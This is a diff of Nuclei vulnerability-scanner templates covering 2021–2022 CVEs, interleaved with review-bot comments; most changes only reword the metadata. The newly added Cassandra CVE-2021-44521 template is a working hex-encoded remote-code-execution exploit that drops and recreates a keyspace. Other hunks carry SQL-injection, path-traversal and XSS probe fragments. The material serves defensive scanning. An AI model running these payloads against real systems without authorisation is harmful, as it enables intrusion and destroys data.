@ -45,3 +47,5 @@ requests:
name: RCE
words:
- "CVE-2021-41773-POC"
# Enhanced by mp on 2022/02/27
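Review bot: `remediation: Update to Apache HTTP Server 2.4.50 or later.` points at a release this commit itself documents as still vulnerable: the CVE-2021-42013 template in the same commit describes 2.4.50 as an incomplete fix for CVE-2021-41773 and recommends 2.4.51. A reader who follows this line would stop at a bypassable version, so change it to `remediation: Upgrade to Apache HTTP Server 2.4.51 or later.`, which also matches the sibling template's wording. The requests section continues outside the hunk.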


@ -4,7 +4,7 @@ info:
name: PlaceOS 1.2109.1 - Open Redirection
author: geeknik
severity: medium
description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect
description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.
reference:
- https://github.com/PlaceOS/auth/issues/36
- https://www.exploit-db.com/exploits/50359
@ -34,3 +34,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
# Enhanced by mp on 2022/02/27


@ -1,11 +1,12 @@
id: CVE-2021-41878
info:
name: i-Panel Administration System - Reflected XSS
name: i-Panel Administration System - Reflected Cross-Site Scripting
author: madrobot
severity: medium
description: A reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
description: A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41878
- https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878
classification:
@ -35,3 +36,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/02/27


@ -1,9 +1,9 @@
id: CVE-2021-41951
info:
name: Resourcespace - Reflected XSS
name: Resourcespace - Reflected Cross-Site Scripting
author: coldfish
description: ResourceSpace before 9.6 rev 18290 is affected by a reflected Cross-Site Scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
description: ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
severity: medium
tags: cve,cve2021,xss,resourcespace
reference:
@ -33,4 +33,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/27


@ -4,8 +4,10 @@ info:
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
author: nvn1729,0xd0ff9
severity: critical
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
remediation: Upgrade to Apache HTTP Server 2.4.51 or later.
reference:
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d
- https://nvd.nist.gov/vuln/detail/CVE-2021-42013
- https://twitter.com/itsecurityco/status/1446136957117943815
@ -44,3 +46,5 @@ requests:
name: RCE
words:
- "CVE-2021-42013"
# Enhanced by mp on 2022/02/27


@ -1,17 +1,11 @@
id: CVE-2021-42258
info:
name: BillQuick Web Suite SQLi
name: BillQuick Web Suite SQL Injection
author: dwisiswant0
severity: critical
tags: cve,cve2021,sqli,billquick
description: |
BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
allows SQL injection for unauthenticated remote code execution,
as exploited in the wild in October 2021 for ransomware installation.
SQL injection can, for example, use the txtID (aka username) parameter.
Successful exploitation can include the ability to execute
arbitrary code as MSSQLSERVER$ via xp_cmdshell.
description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.
reference:
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
@ -34,7 +28,7 @@ requests:
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
cookie-reuse: true
extractors:
@ -67,3 +61,5 @@ requests:
- "System.Data.SqlClient.SqlException"
- "Incorrect syntax near"
- "_ACCOUNTLOCKED"
# Enhanced by mp on 2022/02/27
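Review bot: The shortened `description` drops two facts the old text carried that defenders use for triage: that the flaw was exploited in the wild (October 2021, ransomware installation) and that the `txtID` parameter is the injection point, which the request body below still shows (`txtID=uname%27`). Keep them, e.g. append `Exploited in the wild in October 2021 for ransomware installation; the txtID parameter is one injection point.` to the description, and add `remediation: Upgrade to BillQuick Web Suite 22.0.9.1 or later.` since the description already names that version as the fix boundary. The requests section starts outside the hunk.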


@ -1,13 +1,13 @@
id: CVE-2021-42551
info:
name: NetBiblio WebOPAC - Reflected XSS
name: NetBiblio WebOPAC - Reflected Cross-Site Scripting
author: compr00t
severity: medium
description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected Cross-Site Scripting vulnerability in its Wikipedia modul through /NetBiblio/search/shortview via the searchTerm parameter.
description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-42551
- https://www.redguard.ch/advisories/netbiblio_webopac.txt
- https://www.cve.org/CVERecord?id=CVE-2021-42551
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -45,3 +45,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/27


@ -2,11 +2,11 @@ id: CVE-2021-42565
info:
author: madrobot
name: myfactory FMS - Reflected XSS
name: myfactory FMS - Reflected Cross-Site Scripting
severity: medium
description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter.
description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
- https://nvd.nist.gov/vuln/detail/CVE-2021-42565
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@ -37,3 +37,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/02/27


@ -1,11 +1,12 @@
id: CVE-2021-42566
info:
name: myfactory FMS - Reflected XSS
name: myfactory FMS - Reflected Cross-Site Scripting
author: madrobot
severity: medium
description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter.
description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-42566
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
classification:
@ -37,3 +38,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/02/28


@ -1,10 +1,10 @@
id: CVE-2021-42567
info:
name: Apereo CAS Reflected XSS
name: Apereo CAS Reflected Cross-Site Scripting
author: pdteam
severity: medium
description: Apereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints.
description: Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.
reference:
- https://apereo.github.io/2021/10/18/restvuln/
- https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 401
# Enhanced by mp on 2022/02/28


@ -1,10 +1,10 @@
id: CVE-2021-43062
info:
name: Fortinet Fortimail 7.0.1 - Reflected XSS
name: Fortinet FortiMail 7.0.1 - Reflected Cross-Site Scripting
author: ajaysenr
severity: medium
description: An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-43062
- https://www.fortiguard.com/psirt/FG-IR-21-185
@ -38,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28


@ -4,6 +4,8 @@ info:
name: Pre-Auth Takeover of Build Pipelines in GoCD
author: dhiyaneshDk
severity: critical
description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.
remediation: Upgrade to version v21.3.0. or later.
reference:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
@ -11,6 +13,8 @@ info:
tags: cve,cve2021,go,lfi,gocd,takeover
metadata:
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
classification:
cve-id: CVE-2021-43287
requests:
- method: GET
@ -26,3 +30,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/28
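Review bot: The new `remediation` line has a stray period inside the version string, `Upgrade to version v21.3.0. or later.`; it should read `remediation: Upgrade to version v21.3.0 or later.`. The new `classification` block carries only `cve-id`, while the other templates added in this commit (Cassandra, SAP, Casdoor) also give `cvss-metrics`, `cvss-score` and `cwe-id`; worth adding here if the values are known.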


@ -1,10 +1,10 @@
id: CVE-2021-43495
info:
name: AlquistManager lfi
name: AlquistManager Local File Inclusion
author: pikpikcu
severity: high
description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py
description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
reference:
- https://github.com/AlquistManager/alquist/issues/43
- https://nvd.nist.gov/vuln/detail/CVE-2021-43495
@ -25,3 +25,5 @@ requests:
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/02/28


@ -1,7 +1,7 @@
id: CVE-2021-43496
info:
name: Clustering LFI
name: Clustering Local File Inclusion
author: Evan Rubinstein
severity: high
description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
@ -25,3 +25,5 @@ requests:
part: body
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/28


@ -1,10 +1,11 @@
id: CVE-2021-43778
info:
name: GLPI plugin Barcode < 2.6.1 path traversal vulnerability.
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
author: cckuailong
severity: critical
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file..
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file.
reference:
- https://github.com/AK-blank/CVE-2021-43778
- https://nvd.nist.gov/vuln/detail/CVE-2021-43778
@ -28,3 +29,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
# Enhanced by mp on 2022/02/28
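Review bot: The renamed title keeps a trailing period, `GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.`, which no other `name` value on this page has; suggest `name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability`. Splitting the workaround into `remediation` is a good change; the rest of the hunk is wording only.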


@ -4,8 +4,8 @@ info:
name: Grafana v8.x Arbitrary File Read
author: z0ne,dhiyaneshDk
severity: high
description: Grafana is an open-source analytics and monitoring application. Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
- https://nosec.org/home/detail/4914.html
@ -34,4 +34,4 @@ requests:
status:
- 200
# Enhanced by cs on 2022/02/18
# Enhanced by mp on 2022/02/28


@ -1,10 +1,11 @@
id: CVE-2021-43810
info:
name: Admidio - Reflected XSS
name: Admidio - Reflected Cross-Site Scripting
author: gy741
severity: medium
description: Admidio is a free open source user management system for websites of organizations and groups. A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The Reflected XSS vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts. This issue is patched in version 4.0.12.
description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
remediation: Upgrade to version 4.0.12 or later.
reference:
- https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
- https://nvd.nist.gov/vuln/detail/CVE-2021-43810
@ -36,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28


@ -1,11 +1,14 @@
id: CVE-2021-44228
info:
name: Remote code injection in Log4j
name: Apache Log4j2 Remote Code Injection
author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
severity: critical
description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
reference:
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
@ -68,3 +71,5 @@ requests:
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by mp on 2022/02/28


@ -4,7 +4,7 @@ info:
name: Rosario Student Information System Unauthenticated SQL Injection
author: furkansayim,xShuden
severity: critical
description: An unauthenticated SQL Injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
remediation: Upgrade to version 8.1.1 or higher.
reference:
- https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
@ -42,3 +42,5 @@ requests:
part: header
words:
- "RosarioSIS="
# Enhanced by mp on 2022/02/28


@ -0,0 +1,56 @@
id: CVE-2021-44521
info:
name: Apache Cassandra Load UDF RCE
author: Y4er
description: "When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE."
severity: critical
reference:
- https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-44521
tags: cve,cve2021,network,rce,apache,cassandra
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.10
cve-id: CVE-2021-44521
cwe-id: CWE-94
network:
- inputs:
- data: "050000000500000000"
read: 1024
type: hex
- data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35"
read: 1024
type: hex
- data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
read: 1024
type: hex
- data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b"
read: 1024
type: hex
- data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510"
read: 1024
type: hex
- data: "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"
read: 1024
type: hex
- data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e"
read: 1024
type: hex
- data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281"
read: 1024
type: hex
- data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
type: hex
read: 1024
host:
- "{{Hostname}}"
- "{{Host}}:9042"
matchers:
- type: word
part: raw
words:
- "123123"
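Review bot: This template is destructive against the scanned cluster and nothing in it says so: the third input, the fourth, the fifth and the last input decode to `drop KEYSPACE IF EXISTS test;`, `CREATE KEYSPACE test WITH replication ...`, `CREATE TABLE test.rce ...` and `drop KEYSPACE IF EXISTS test;` again, so any pre-existing keyspace named `test` on the target is dropped twice. Add a comment above `network:` such as `# Destructive: drops and recreates keyspace "test" on the target; existing data in a keyspace of that name is lost`. Two consistency points: the last input lists `type: hex` before `read: 1024`, the reverse of every other entry, and `severity` sits after `description` here while the other templates on this page place it directly after `author`.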


@ -35,3 +35,5 @@ requests:
- 302
- 307
- 308
# Enhanced by mp on 2022/02/28


@ -34,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28


@ -1,10 +1,10 @@
id: CVE-2021-45043
info:
name: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion
name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
author: Momen Eldawakhly,Evan Rubinstein
severity: high
description: Instances of HD-Netowrk Real-time Monitoring System version 2.0 are vulnerable to a Local File Inclusion (LFI) vulnerability which allows remote unauthenticate attackers to view important, confidnetial information.
description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-45043
- https://www.exploit-db.com/exploits/50588
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28


@ -1,10 +1,10 @@
id: CVE-2021-45046
info:
name: Remote code injection in Log4j
name: Apache Log4j2 Remote Code Injection
author: ImNightmaree
severity: critical
description: Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations.
description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
- https://twitter.com/marcioalm/status/1471740771581652995
@ -64,3 +64,5 @@ requests:
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by mp on 2022/02/28


@ -4,7 +4,7 @@ info:
name: Thinfinity Iframe Injection
author: danielmofer
severity: critical
description: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter.
reference:
- https://github.com/cybelesoft/virtualui/issues/2
- https://nvd.nist.gov/vuln/detail/CVE-2021-44848
@ -26,4 +26,8 @@ requests:
regex:
- ".*vpath.*"
- "thinfinity"
condition: and
condition: and
# Enhanced by mp on 2022/02/28
# Enhanced by mp on 2022/02/28
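Review bot: The rewritten description scrambles the sentence: `a function located in /lab.html reachable which by default could allow IFRAME injection` — the old line had `reachable by default that could allow`. Suggest `description: Thinfinity VirtualUI contains a vulnerability in a function located in /lab.html, reachable by default, that could allow IFRAME injection via the "vpath" parameter.`. In the second hunk the `# Enhanced by mp on 2022/02/28` trailer is printed twice and the `condition: and` pair looks like a whitespace-only change; if both trailer lines are on the new side, one of them should be removed.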


@ -1,10 +1,11 @@
id: CVE-2021-45232
info:
name: Apache APISIX Dashboard api unauth access
name: Apache APISIX Dashboard API Unauthorized Access
author: Mr-xn
severity: critical
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication.
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.
reference:
- https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
- https://github.com/pingpongcult/CVE-2021-45232
@ -33,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28
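Review bot: The new description has mismatched delimiters around the second framework name: it opens with a backtick and closes with an apostrophe, with the sentence's period trapped inside (gin.'), so the code span never terminates. Write it the way `droplet` is written on the same line — the name in backticks, then the period — as the old line above does. The new `remediation` line is a useful addition and reads fine.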


@ -1,10 +1,10 @@
id: CVE-2021-45380
info:
name: AppCMS - Reflected Cross-Site Scripting (XSS)
name: AppCMS - Reflected Cross-Site Scripting
author: pikpikcu
severity: medium
description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php.
reference:
- https://github.com/source-trace/appcms/issues/8
- https://nvd.nist.gov/vuln/detail/CVE-2021-45380
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28


@ -1,10 +1,10 @@
id: CVE-2021-46005
info:
name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
name: Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting
author: cckuailong
severity: medium
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.
reference:
- https://www.exploit-db.com/exploits/49546
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
@ -109,3 +109,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28


@ -1,11 +1,13 @@
id: CVE-2022-0149
info:
name: WooCommerce Store Exporter < 2.7.1 - Reflected Cross-Site Scripting (XSS)
name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Reflected Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: The plugin was affected by a Reflected Cross-Site Scripting (XSS) vulnerability in the woo_ce admin page.
reference: https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c
description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.
reference:
- https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c
- https://nvd.nist.gov/vuln/detail/CVE-2022-0149
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -43,3 +45,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28
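Review bot: The renamed title reads `WooCommerce Stored Exporter WordPress Plugin`, but the previous name at the top of the hunk called the plugin `Store Exporter`; "Stored" looks like a slip from the cross-site scripting vocabulary rather than a deliberate correction. Unless the plugin really is named that way, suggest `name: WooCommerce Store Exporter WordPress Plugin < 2.7.1 - Reflected Cross-Site Scripting`. Converting `reference` to a list and adding the NVD entry is fine.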


@ -1,10 +1,10 @@
id: CVE-2022-0218
info:
name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS)
name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting
author: hexcat
severity: medium
description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
description: WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint.
reference:
- https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/
- https://wordpress.org/plugins/wp-html-mail/
@ -38,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28


@ -4,7 +4,7 @@ info:
name: Microweber Information Disclosure
author: pikpikcu
severity: high
description: Exposure of Sensitive Information to an Unauthorized Actor in Packagist microweber/microweber prior to 1.2.11.
description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0281
tags: cve,cve2022,microweber,disclosure
@ -34,3 +34,5 @@ requests:
- '"email":'
- '"display_name":'
condition: and
# Enhanced by mp on 2022/02/28


@ -1,10 +1,10 @@
id: CVE-2022-0378
info:
name: Microweber XSS
name: Microweber Reflected Cross-Site Scripting
author: pikpikcu
severity: medium
description: Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.
description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0378
tags: cve,cve2022,microweber,xss
@ -33,3 +33,5 @@ requests:
- 'mwui_init'
- 'onmousemove="alert(document.domain)'
condition: and
# Enhanced by mp on 2022/02/28


@ -1,10 +1,10 @@
id: CVE-2022-0432
info:
name: CVE-2022-0432
name: Mastodon Prototype Pollution Vulnerability
author: pikpikcu
severity: medium
description: Prototype Pollution in GitHub repository mastodon/mastodon prior to 3.5.0.
description: The GitHub repository mastodon/mastodon prior to 3.5.0 contains a Prototype Pollution vulnerability.
reference:
- https://github.com/mastodon/mastodon/commit/4d6d4b43c6186a13e67b92eaf70fe1b70ea24a09
- https://drive.google.com/file/d/1vpZ0CcmFhTEUasLTPUBf8o-4l7G6ojtG/view
@ -31,3 +31,5 @@ requests:
part: body
words:
- "if (data.type !== 'setHeight' || !iframes[data.id]) {"
# Enhanced by mp on 2022/02/28


@ -1,13 +1,17 @@
id: CVE-2022-0653
info:
name: Wordpress Profile Builder Plugin XSS
name: Wordpress Profile Builder Plugin Cross-Site Scripting
author: dhiyaneshDk
severity: medium
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653
- https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
tags: cve,cve2022,wordpress,xss,wp-plugin
